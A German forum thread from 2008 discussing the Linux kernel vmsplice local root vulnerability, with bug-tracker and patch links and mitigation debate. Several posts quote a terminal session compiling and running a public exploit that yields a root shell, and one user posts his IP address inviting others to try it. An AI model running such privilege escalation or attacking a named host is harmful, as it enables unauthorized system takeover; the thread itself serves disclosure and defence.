PDA

Vollständige Version anzeigen : Sicherheitsluecke Linux Debian



Rheinlaender
11.02.2008, 05:18
Seit etwa 17 Std. ist eine Sicherheitsluecke im Linux-Kernel bekannt:

https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587

Der bug ist nur fuer Debian geloggt - ist aber fuer alle Kernel, einschliesslich 2.6.24 gueltig (Test auf SuSE 10.3):


~/TempInstall/BugKernel.11.02.08> vi exploid.c
~/TempInstall/BugKernel.11.02.08> gcc exploid.c -o exploid
~/TempInstall/BugKernel.11.02.08> ./exploid
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dcc000 .. 0xb7dfe000
[+] root
~/TempInstall/BugKernel.11.02.08 #

Upppsss ... root-Shell ohne Passwort!

Um diese Sicherheitsluecke zu schliessen:

https://bugs.gentoo.org/show_bug.cgi?id=209460

wtf
11.02.2008, 05:30
Ist das Windows ME des Servers auch betroffen?

Rheinlaender
11.02.2008, 05:34
Ist das Windows ME des Servers auch betroffen?

Ein Server, der auf WIN ME laeuft? Das ist doch mal etwas Orginelles!

wtf
11.02.2008, 05:37
Ja, protected by Norton and Zonealarm ;)

SLOPPY
11.02.2008, 17:46
Seit etwa 17 Std. ist eine Sicherheitsluecke im Linux-Kernel bekannt:

https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587

Der bug ist nur fuer Debian geloggt - ist aber fuer alle Kernel, einschliesslich 2.6.24 gueltig (Test auf SuSE 10.3):


~/TempInstall/BugKernel.11.02.08> vi exploid.c
~/TempInstall/BugKernel.11.02.08> gcc exploid.c -o exploid
~/TempInstall/BugKernel.11.02.08> ./exploid
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dcc000 .. 0xb7dfe000
[+] root
~/TempInstall/BugKernel.11.02.08 # Upppsss ... root-Shell ohne Passwort!
Um diese Sicherheitsluecke zu schliessen:
https://bugs.gentoo.org/show_bug.cgi?id=209460


...root-exploit betrifft keine remote Aufrufe, und wenn ist er dann nur in Systemen "gefährlich", wo mehrere Konten angemeldet sind.

Habs bei mit getestet (Debian Lenny, Kernel 2.6.22.3-686) - keine Anmeldung des Users in der Shell als root ohne Passwort möglich) :]

Desweiteren ist das System sicher, wenn remote Anmeldungen sowieso gesperrt sind.

Benutzer von M$-Systemen wären wohl überglücklich, wenn Exploits bei ihnen auch nur ähnlich "schwerwiegend" wären.

Andererseits zeigt es sich mal wieder, dass nichts absolut sicher ist.

Rheinlaender
11.02.2008, 17:53
[Habs bei mit getestet (Debian Lenny, Kernel 2.6.22.3-686) - keine Anmeldung des Users in der Shell als root ohne Passwort möglich) :]

Hast Du das kl. Programmchen wirklich kompiliert und ausgefuehrt? Der Access funktioiert auch remote - Du hast den rechner nach Aussen offen und erlaubst aber einfachen Usern einen ssh-Access. Nichts im ssh-Protokoll hindert einen User vmsplice aufzurufen und in der vmsplice.c des Kernel steckt der Bug.

Du kannst nur zwei Dinge machen: entweder den Patch in dievmsplice.c einzubauen oder vmsplice zu disablen, den Kernel neu kompilieren und die Kiste neu starten. Oder wie ich alle Ports nach aussen dicht machen.

Die ssh ist im uebrigen wichtig, wie sonst kannst z. B. in der Kueche auf dem Rechner im Arbeitszimmer arbeiten?

SLOPPY
11.02.2008, 19:15
Hast Du das kl. Programmchen wirklich kompiliert und ausgefuehrt? Der Access funktioiert auch remote - Du hast den rechner nach Aussen offen und erlaubst aber einfachen Usern einen ssh-Access. Nichts im ssh-Protokoll hindert einen User vmsplice aufzurufen und in der vmsplice.c des Kernel steckt der Bug.
Du kannst nur zwei Dinge machen: entweder den Patch in die vmsplice.c einzubauen oder vmsplice zu disablen, den Kernel neu kompilieren und die Kiste neu starten. Oder wie ich alle Ports nach aussen dicht machen.
Die ssh ist im uebrigen wichtig, wie sonst kannst z. B. in der Kueche auf dem Rechner im Arbeitszimmer arbeiten?

... na dann probiers doch mal bei mir. Meine IP ist 84.160.205.78 ;)

Doc Gyneco
11.02.2008, 19:21
Seit etwa 17 Std. ist eine Sicherheitsluecke im Linux-Kernel bekannt:

https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587

Der bug ist nur fuer Debian geloggt - ist aber fuer alle Kernel, einschliesslich 2.6.24 gueltig (Test auf SuSE 10.3):


~/TempInstall/BugKernel.11.02.08> vi exploid.c
~/TempInstall/BugKernel.11.02.08> gcc exploid.c -o exploid
~/TempInstall/BugKernel.11.02.08> ./exploid
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dcc000 .. 0xb7dfe000
[+] root
~/TempInstall/BugKernel.11.02.08 # Upppsss ... root-Shell ohne Passwort!
Um diese Sicherheitsluecke zu schliessen:
https://bugs.gentoo.org/show_bug.cgi?id=209460


...root-exploit betrifft keine remote Aufrufe, und wenn ist er dann nur in Systemen "gefährlich", wo mehrere Konten angemeldet sind.

Habs bei mit getestet (Debian Lenny, Kernel 2.6.22.3-686) - keine Anmeldung des Users in der Shell als root ohne Passwort möglich) :]

Desweiteren ist das System sicher, wenn remote Anmeldungen sowieso gesperrt sind.

Benutzer von M$-Systemen wären wohl überglücklich, wenn Exploits bei ihnen auch nur ähnlich "schwerwiegend" wären.

Andererseits zeigt es sich mal wieder, dass nichts absolut sicher ist.




Aber Sloppy, Du weisst doch sicher auch !!!

ES GIBT KEINE 100% SICHERHEIT !

Weder bei Linux, bei Mac, noch bei Windows !

:D :D :D

SLOPPY
11.02.2008, 19:30
[quote=SLOPPY;1950365]
Aber Sloppy, Du weisst doch sicher auch !!!
ES GIBT KEINE 100% SICHERHEIT !
Weder bei Linux, bei Mac, noch bei Windows !
:D :D :D

... so isses, deswegen schrieb ich ja


Andererseits zeigt es sich mal wieder, dass nichts absolut sicher ist.

dZUG
11.02.2008, 21:31
:D ich hab diesen Kernel bei Ubuntu (DEBIAN):

uname -a
Linux 2.6.22-14-generic #1 SMP Sun Oct 14 23:05:12 GMT 2007 i686

also noch der alte alte kernel.
Bei mir funktioniert das automatische update nicht, vielleicht ist
da ein Update mal gekommen.... WER WEISS :D

@Reihnlaender

gib mir bitte den Link, wo ich nur drücken muss ohne zu lesen :D